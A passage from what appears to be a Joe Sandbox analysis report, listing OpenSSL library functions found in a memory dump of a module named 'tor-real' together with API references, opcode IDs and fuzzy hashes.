                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D45F7
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4602
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: i
                                                                            • API String ID: 306345296-3865851505
                                                                            • Opcode ID: b5ac01d01eaba8f65d11d127ba4baf612cb274de50bb68763eba03954c72cbe3
                                                                            • Instruction ID: 1c9845ece672c102dd0c23aff14546f40812b305d2dff72837f1cdf1ffa923d2
                                                                            • Opcode Fuzzy Hash: b5ac01d01eaba8f65d11d127ba4baf612cb274de50bb68763eba03954c72cbe3
                                                                            • Instruction Fuzzy Hash: 23F037B16483009FC7009FA4E081B6EBBF4BF84308F418A0DE889ABA20C731E4588B06
                                                                            Function 6C0AE421 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1631441854-3554254475
                                                                            • Opcode ID: 437ad7e784d5ff5e980da6d196f62bd8776900cf52e7ecd3d20345b9c66e9a00
                                                                            • Instruction ID: 622f3aca3d0e96c4a9970cae41e3c57d0364cf73717bc952c578fbba9d81fcaf
                                                                            • Opcode Fuzzy Hash: 437ad7e784d5ff5e980da6d196f62bd8776900cf52e7ecd3d20345b9c66e9a00
                                                                            • Instruction Fuzzy Hash: 7AF0AEB1008705EED3019FA0C58535EBBE0AF84348F218C0CE2D89B761CBB994899B4A
                                                                            Function 6C0BCC36 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BCC80
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BCC8F
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BCCAA
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCD34
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCDA0
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0BCDCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_write_lockH_deleteH_retrieve__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 987486398-0
                                                                            • Opcode ID: c0d510953f04040aaa718dcc6b181d8d69f21b33f5a59f26385d23c82dcc23c6
                                                                            • Instruction ID: 2f461fe403eee7bd2f538a6436f1254b364676dde76f714fcef2548cdfae30d6
                                                                            • Opcode Fuzzy Hash: c0d510953f04040aaa718dcc6b181d8d69f21b33f5a59f26385d23c82dcc23c6
                                                                            • Instruction Fuzzy Hash: 5531F674A0A7018FDB44DF25C584B9ABBE0BF88708F1549ADE899AB750D731E940CF42
                                                                            Function 6C0BC6B7 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BC6C9
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC6D8
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BC6EF
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC7BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3617886225-0
                                                                            • Opcode ID: eabec38505decd3a6f2c83d404c24a2ff72e237b64ff63bcfea3c1a8a0e5e949
                                                                            • Instruction ID: da1179f272e67ce57f29ec3ab351946d3ab68d57983f1e4051e3e7e87ae79f8d
                                                                            • Opcode Fuzzy Hash: eabec38505decd3a6f2c83d404c24a2ff72e237b64ff63bcfea3c1a8a0e5e949
                                                                            • Instruction Fuzzy Hash: C8216D70686B018FE750EF38C580BDAB7E4BF45308F60496CD4A8E7B40DB32E5848B91
                                                                            Function 6C0AC640 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_strdupstrlen
                                                                            • String ID:
                                                                            • API String ID: 3235580710-0
                                                                            • Opcode ID: 704a548a0cb00fb387a343acedd1742890965b41709ea0a342a21ae3d0d46cc5
                                                                            • Instruction ID: 78553cececfd23ead70fdd94559ec9e76096a57181990e9c8d5a8284d78f38f5
                                                                            • Opcode Fuzzy Hash: 704a548a0cb00fb387a343acedd1742890965b41709ea0a342a21ae3d0d46cc5
                                                                            • Instruction Fuzzy Hash: 5D0169B15097018BD700AF64E48534BBBE0AF44318F518C2CE49A8BB11D775E885CB92
                                                                            Function 6C0B4C98 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4CBA
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4CC5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4CDD
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4D09
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID:
                                                                            • API String ID: 3920316597-0
                                                                            • Opcode ID: c2f8f3fb304399d9a12a05d5764f989891605691cc7e157807c27014475e216e
                                                                            • Instruction ID: 3c088432b1d556a9428f22fa981dc000e5f845b2098074b31bb493f0e6aa40c5
                                                                            • Opcode Fuzzy Hash: c2f8f3fb304399d9a12a05d5764f989891605691cc7e157807c27014475e216e
                                                                            • Instruction Fuzzy Hash: 9F013271208700AFD7009FA4D48035EBBF0EF85328F218E1CE1A8ABB50C739E5048B86
                                                                            Function 6C0AC590 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5C1
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5E0
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0AC5F3
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC60B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$L_sk_pop_free
                                                                            • String ID:
                                                                            • API String ID: 1650471521-0
                                                                            • Opcode ID: bdda0e8a0e0290a5fb85316f04efcccdcc10a6452245bc7b0f333c844efc40c5
                                                                            • Instruction ID: 45fca4b6ad346a2a3522c1d1d80e64265b25124c5449aa38cb579e37a446c977
                                                                            • Opcode Fuzzy Hash: bdda0e8a0e0290a5fb85316f04efcccdcc10a6452245bc7b0f333c844efc40c5
                                                                            • Instruction Fuzzy Hash: 530144B1508701ABCB01AFA4D08565EBBE4BF85358F518A0CE8C45BB10D330E589CB82
                                                                            Function 6C096B00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: D$P
                                                                            • API String ID: 2581946324-307317852
                                                                            • Opcode ID: 5b6bfc75bf7dc2109e66176423b612e476289c0bba998f735780e07fd4043dd0
                                                                            • Instruction ID: d97399dee441e94f9c5b448fc42d88c03d4caa5787053c05e99a8c203c3f4b4f
                                                                            • Opcode Fuzzy Hash: 5b6bfc75bf7dc2109e66176423b612e476289c0bba998f735780e07fd4043dd0
                                                                            • Instruction Fuzzy Hash: 1261C0B46053058BDB40DF26C08079ABBE0BF88318F6585B9DC588F756E735E942DFA1
                                                                            Function 6C0C2A0C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C2A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memcmp
                                                                            • String ID: *$D
                                                                            • API String ID: 2788248766-1254260235
                                                                            • Opcode ID: 1d75cae2a9ce51358939edfe5d1b624e607c388b5334daab60a87c81f2889c2b
                                                                            • Instruction ID: 44b68ef8351548d5d8c86ce0de6931c6000d11c37d4c2172307b6d7d8d1d71d5
                                                                            • Opcode Fuzzy Hash: 1d75cae2a9ce51358939edfe5d1b624e607c388b5334daab60a87c81f2889c2b
                                                                            • Instruction Fuzzy Hash: 07211A716097118FD720DF25C58839EBBE0AF84748F12991DD898ABA00DB75E909DF82
                                                                            Function 6C096453 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096471
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09648C
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: J
                                                                            • API String ID: 2581946324-1141589763
                                                                            • Opcode ID: 6f4c63827c7686be360c01548e18779bd4e1dd25ca3dd3c961c399858b8851a2
                                                                            • Instruction ID: edebc3252907c73ca7edff639884016a3b471d1d1733eea418135077a2d340ee
                                                                            • Opcode Fuzzy Hash: 6f4c63827c7686be360c01548e18779bd4e1dd25ca3dd3c961c399858b8851a2
                                                                            • Instruction Fuzzy Hash: 5C21D3B5205B018FC710DFBAD49075AB7E0BF48314F405A2DE9CADBB50E774E8859B85
                                                                            Function 6C0964AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0964C9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0964E4
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: Q
                                                                            • API String ID: 2581946324-3463352047
                                                                            • Opcode ID: 35327e9f3396a79b600fabbe7bdf5da357509249ddbef8ba260ba4b78942bc6d
                                                                            • Instruction ID: 45420ea1f35a5b0f7903cc0d6ef8bbe8b145e244edde560feda4bdb075f86d3c
                                                                            • Opcode Fuzzy Hash: 35327e9f3396a79b600fabbe7bdf5da357509249ddbef8ba260ba4b78942bc6d
                                                                            • Instruction Fuzzy Hash: A311D2B5205B018BC710DF6AD49035ABBE0BF48324F405A2DD9DACBB60E774E8858B81
                                                                            Function 6C096504 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096521
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09653C
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: X
                                                                            • API String ID: 2581946324-3081909835
                                                                            • Opcode ID: 85ee7b8a634d0e88fc93991626a623573c2318e3e12a7f4e40e25bac5fb1d0f3
                                                                            • Instruction ID: e2a72552e6250804eda54ab0d1c5132626cc46b837309172d8cffe09466382c5
                                                                            • Opcode Fuzzy Hash: 85ee7b8a634d0e88fc93991626a623573c2318e3e12a7f4e40e25bac5fb1d0f3
                                                                            • Instruction Fuzzy Hash: B3110DB5205B008FC710DF69D48035AFBE0BF88324F408A2DE9DA9BB60D334E885CB81
                                                                            Function 6C0DEF43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEF7F
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0DF9F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeR_put_errorY_free__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 304499002-450215437
                                                                            • Opcode ID: ee331ccf3628db1d97e4ff00e432c5812387b5455de9a3da29ec27e73aec4a4b
                                                                            • Instruction ID: 1d4d9b47c9e19f86bf9ce70a46b06d524328a332aa1238b952c3b12e012938c7
                                                                            • Opcode Fuzzy Hash: ee331ccf3628db1d97e4ff00e432c5812387b5455de9a3da29ec27e73aec4a4b
